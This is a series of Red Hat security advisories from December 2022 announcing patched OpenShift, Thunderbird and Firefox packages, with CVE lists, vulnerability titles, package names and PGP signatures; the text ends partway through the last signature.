Red Hat Security Advisory 2022-8893-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.20.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.20 security update  
Advisory ID:       RHSA-2022:8893-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8893  
Issue date:        2022-12-15  
CVE Names:         CVE-2021-22570 CVE-2022-1158 CVE-2022-2639  
                   CVE-2022-24302 CVE-2022-27191 CVE-2022-42010  
                   CVE-2022-42011 CVE-2022-42012 CVE-2022-42898  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.20 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.20. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2022:8892

Security Fix(es):

* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures.

The image digests may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags  
The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:e86e058f7f66a687e273792f2e4ec70f3cc43ec9d2894bebee5caf5c4d4851a3

(For s390x architecture)  
The image digest is  
sha256:bab321a15615e824998f6b92e7df094761f4b8ca8417ca0efd669ef942981f2f

(For ppc64le architecture)  
The image digest is  
sha256:6c50689588e33ec4def2b8445e12def6ae79ff61d86145dbea0d27e4f5ad02b7

(For aarch64 architecture)  
The image digest is  
sha256:dcdbb16f5cab5fce07a7ad64aac8fa61aff640af6a039977c360de0cceb18017

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server  
2090914 - OCP RHEL 8 worker node fails to reboot during upgrade playbook run

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-2554 - ingress, authentication and console operator goes to degraded after switching default application router scope  
OCPBUGS-2970 - [2116547] phyc2sys config will be automatically added to ptpconfigs even if it is not included in user PGT  
OCPBUGS-3015 - Minor test fixes related to getting updated profile and checking kubeletconfiguration  
OCPBUGS-3023 - GCP: missing multiple regions  
OCPBUGS-3049 - [release-4.11] openshift-ingress-operator with mTLS does not download CRL  
OCPBUGS-3478 - [4.11] Baremetal Provisioning fails on HP Gen9 systems due to eTag handling  
OCPBUGS-3819 - Origin tests for bonds - 4.11 backport  
OCPBUGS-3852 - [4.11][Dual Stack] ovn-ipsec crashlooping due to cert signing issues  
OCPBUGS-3908 - [4.11] OVN-Kubernetes should not send IPs with leading zeros to OVN  
OCPBUGS-4137 - [4.11] Ipsec pods restart due to liveness probes fail in cluster with more than 150 +  
OCPBUGS-4163 - [release-4.11] The last egressIP in IP capacity cannot be applied correctly  
OCPBUGS-4167 - [Azure] Some cloudprivateipconfig IP is error status  
OCPBUGS-4179 - [release-4.11] Fix assign error display for cloudprivateipconfig  
OCPBUGS-4233 - Updating ose-cloud-network-config-controller images to be consistent with ART  
OCPBUGS-4294 - Backport to 4.11 specify resources.requests for operator pod  
OCPBUGS-4325 - [gcp] when the optional Service Usage API is disabled, IPI installation cannot succeed  
OCPBUGS-4398 -  CVE-2022-27191 ose-installer-container: golang: crash in a golang.org/x/crypto/ssh server [openshift-4]  
OCPBUGS-4410 - [4.13] Improve ironic logging configuration in metal3  
OCPBUGS-4528 - Disconnected Openshift cluster on AWS having problem with manual egress IP assignment  
OCPBUGS-4532 - CSR are generated with incorrect Subject Alternate Names

6. References:

https://access.redhat.com/security/cve/CVE-2021-22570  
https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-24302  
https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhG9zjgjWX9erEAQjTMg/8CKbkSiBW4yyJgW17d2iZVpf2RQ1CBfgd  
EkCwPcL0tvfFY0KU8DMkOJehvX5bS6jEl27h3r6OAj2TuQFAy7aYma7C1fQgQX2q  
jxI5A7Zc1xcjEuaSwGwS8/4l2aMFlBgt7iPcv5FBNLTLfTjhQAbh3a+jYsRqM5D0  
Z4xNmc0xXR/4FXJ0qg0Flxom5NX4fB9mUQyNtbO5Gcus4ritNeKsfgKT9V9eOJm7  
0SBYXOXhN3iwn+prGiOSTIG4QYm9oUih+cdqz7hk7Nm+WbCytmkQw3JRIrDtHcd5  
IcNSyYfZDxNSdEgi6uWMXhroa53FJA9ZRnpWMYGG1uuDp8kgEDEgu5osTbx0zZlb  
82wf3TXjgPj6/4BjgpW4pB2fTNbAPc/FY4oGtBcsY7lo6B62vmSfFJ3HitdohB2S  
YRvzTA/ypOKMR7UdNM1UX3nOswN3jytzzUpRzJF31BKUDyHAo0EbXSJRO5RZKggT  
gFakEHu7dcozCDTH8O+74ax5yUQ00Y9gmIsoe/zgt5ycLqB852tOwdCgpICrY3Ot  
HVamgD2FXpKSDExwoougXAVCPHxDoGJ+Myey1atKTZt/YKpnR0hjF79K5eX3RCkx  
2rQ7uQ5XwAb4hv9n5pEsh7LAoWnAMkwamITWIQFXoJXDfHy6yAh/mI8tH/p94HRK  
hje0BLZLdSE=Rw38  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8893-01

Red Hat Security Advisory 2022-9079-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9079-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9079  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.6.0-2.el7_9.src.rpm

x86_64:  
thunderbird-102.6.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.6.0-2.el7_9.src.rpm

ppc64le:  
thunderbird-102.6.0-2.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.6.0-2.el7_9.src.rpm

x86_64:  
thunderbird-102.6.0-2.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug+9zjgjWX9erEAQiV3hAAh3uPsCvyTjse9NsVVfwIp1m8+zr2U0R1  
ddP+v4TMncoHIRDvJJpwjbl7iH99KwHVDhG3iL22U51osmrFUScU9u4a/LzU4lF7  
qB+SZcKsGcnhPwm860+J+4dO27PkyR+fH7Rf2uOtspcxVHIqvbjaI2uyqncgm9Et  
f0fBgiEZ2Z5o8sjLS97rv0hNRb8ESOczfzVUpxJYMoCxWy5FbFmBomnkfBdcdSpL  
yWmEv5wLkJ72hq6vTJIjoVuiHYxjzX34EPbreuNbRhE3jhPp+32Z6McFq5Ac9oPZ  
3b1QQWawzSlk6v/GUiciqa/FSgqoOFri9Nn5MHq4r2fnUktvZOSc9JWZlV0JZU6H  
O/MZQvojpCep9hRmy4KNIY0QD4xCp6yx9JhJrXFM0+BDHytOdM6lSfcVHZIYlJx+  
xezON5p2SFjPSRPq4WC+aXb95HoobO9Ssoa3p/Wen3tPM4aMWDyrwznzF1BQ5GR+  
KZbuVxZlGUaBMD1/d0D9VVW/V6Qs5N8WCj+cnPnc/m+BY780gM4RN96DJHRhv4NU  
2FLLjcZxR9pfdp3tGeXeGrhTdBMbdhjPheGWMGgddg6Txm47SqYacFaEaH/XfwLf  
1dPXT6/Mrp0/nRUMDJLdw0YspSYdGF7/yQagihrsYit6afiUyHjnnxrl1I2mJKeE  
n6Mib/lcL98=FZY6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9079-01

Red Hat Security Advisory 2022-9072-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9072-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9072  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.6.0-1.el7_9.src.rpm

x86_64:  
firefox-102.6.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.6.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.6.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.6.0-1.el7_9.src.rpm

ppc64:  
firefox-102.6.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-102.6.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-102.6.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el7_9.s390x.rpm  
firefox-debuginfo-102.6.0-1.el7_9.s390x.rpm

x86_64:  
firefox-102.6.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.6.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.6.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.6.0-1.el7_9.src.rpm

x86_64:  
firefox-102.6.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.6.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.6.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug8dzjgjWX9erEAQjuBQ//Tl3v82tjVu3+2wHy1yAyNOWdyI/EE+7x  
gHi2ATNybWxFXvkMEM/0jyGk3P/lA/NDEj4WgcXVWgNhTd+3QAgBWYHbSf6O12nY  
b0BvsFDtSVKzSVSkD0W97qhZs8azZbP6T8NiJErZEfCc6OeBLot0wXjAMzhvhXcL  
qA9GNzrWOLHTuLISqAa06sYhkOUVt9JQtH1a7EGDKGC9B+U7XphKKtxyIvS75HXY  
lUXSppv+5hacyCUqgeOV4koZvpK8QH48GYRbOpOHmsh8G+Pl2et9MQWc4V/3qull  
tW/4+I31tZ9JoU34mM2ZlhCXMFhqrT2Ns4762d4+CMWiVIoLjj0IiO2WPiDMI7+E  
jNufZxoptAdffmd9FhobHz0ZQ1hQr+aUk2fM5Am+c+1qjRT557V3I29N4J10F1lt  
ejT5fEM35k8o/0+qmGBb/ZG6h0KtewfpbcFNTYC67JDDt0vrkFfikuC1UL27gTlt  
g49xXwhpMRrRFgYINu2dIbLREFmrq7OdLp4LtLuu/R4k33oAxmw8Ustoq/ErWpoj  
iJGigOptLCnFY1x2xu4ZjrcsFPMjMTb1GA8OTOepCHFwPmcs8zbSX+b6ZXf8tFsl  
9en+05j56wJ9/4c0y4yE6B45eVpR0ugm7X4q7iL2QlQNXLComU3xarM3j5RNwrEv  
Zg1OLKCr/j8=N+k7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9072-01

Red Hat Security Advisory 2022-9065-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9065-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9065  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.6.0-1.el9_1.src.rpm

aarch64:  
firefox-102.6.0-1.el9_1.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el9_1.aarch64.rpm  
firefox-debugsource-102.6.0-1.el9_1.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el9_1.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el9_1.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el9_1.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el9_1.s390x.rpm  
firefox-debuginfo-102.6.0-1.el9_1.s390x.rpm  
firefox-debugsource-102.6.0-1.el9_1.s390x.rpm

x86_64:  
firefox-102.6.0-1.el9_1.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el9_1.x86_64.rpm  
firefox-debugsource-102.6.0-1.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhDtzjgjWX9erEAQg+Iw/+L6wbs/OMyqbFlZXphxM06SIiIT3Bgfi4  
39ArJ3CtIBpEWftS3j5bnF2BrsWjyGyq+hsJuoobNjBY1x5b+FDpzCAB9xQsljvA  
0pFZlPp09Rja6cZ387LHGNy3vuLPIaZFxLGSwhE9pcVZKwsEHuoOuTx5vdXcPMGt  
S2a8jh1gf1vzaY/sFhnGu8G9PIlX6R5dJBiaiz2gvkwV/R4yye2hAEbqA4SNCTwA  
N2jhrKkH6NGAQEH858csITiT9+Our4SThDF+EXaCGKjxTXUVXf07uQAOCEhQIxvZ  
Z9IfTQSRKolK/bsl03ItZfz9+crX2+tZetDMHHeQ48zGdWJyLGyHQH+LOWYyt3WB  
+XvRMIzg9rPCDeIc+IoDNQlld1Pe50TkgHB4SXrceB0sztC1WfLrBp/BemnHXz3K  
WURh/G5mw9503+YZICCx4eKrm9aBmECjMddMMpQWiTBny8pHJM3CXbi0Jab5Hguk  
Xw7y89yJWlN+RDTK+YHVFOqTX4QeCYTSvQQoy4usoFB77M3njbHLnEtw1bgDzUeW  
aN+uxS4zYrXcBXPmjzBYzR6577q/VD1V8d5thBLkXNAQb9DlQrUW5YWYtCxHBLj1  
hbzv78KCnthx7Nh1UqHqVXm6YGm4J5Zec85/zmVqskbbVK1VE/WfaxJcWul0n5J8  
luIpM3wair4=1lRv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9065-01

Red Hat Security Advisory 2022-9069-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9069-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9069  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
firefox-102.6.0-1.el8_4.src.rpm

aarch64:  
firefox-102.6.0-1.el8_4.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_4.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_4.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_4.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_4.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_4.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_4.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_4.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_4.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_4.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_4.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug9NzjgjWX9erEAQgvGBAAm3DsjV2ukRrjY3hWSokjyaVPpt9YzgED  
